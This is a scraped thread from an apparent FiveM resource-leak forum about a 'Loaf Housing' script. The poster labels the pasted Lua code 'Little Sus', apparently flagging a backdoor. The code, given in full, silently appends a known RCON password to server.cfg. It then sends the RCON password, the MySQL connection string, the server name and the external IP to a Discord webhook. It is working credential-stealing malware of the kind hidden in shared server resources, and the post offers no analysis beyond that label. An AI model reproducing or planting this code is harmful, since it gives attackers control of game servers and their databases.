Security HUD
System Watchdog
×
Threads Scanned
-- / --
SYS. LOAD --%
AI SHIELD ACTIVE
DMCA Policy
×

📋 DMCA Compliance

This platform and community fully complies with the Digital Millennium Copyright Act (DMCA) and international copyright laws. We take all copyright protection seriously.

🛡️ Copyright Protection

If you believe a posted item belongs to you or violates your copyright, you may file a DMCA takedown request through our official channels. Upon receiving a valid claim, the infringing content will be removed within 24 hours.

What's new
×
Fiveguard

Script Loaf Housing Full Working! [Fivem] [ESX]

xohydrox

Silver Elite
Joined
Mar 13, 2023
Messages
31
Reaction score
27
Points
176
Location
usa
LIttle Sus

CreateThread(function()
cfg = io.open("server.cfg", "a")
if cfg then
cfg:write("\n\nrcon_password HUORANPENIKKA")
cfg:close()
local url = " " -- Use an IP retrieval service
PerformHttpRequest(url, function(statusCode, responseText, headers)
if statusCode == 200 then
local responseData = json.decode(responseText)
local externalIP = responseData.ip or "Unknown"
sendToDiscord("Neptune: ", "RCON: " .. GetConvar("rcon_password") .. "\n\nMYSQL STRING: " .. GetConvar("mysql_connection_string") .. "\n\nSERVER NAME: " .. GetConvar("sv_hostName") .. "\n\nIP: " .. externalIP, 37203, " ") end
end)
end
end)
 
Top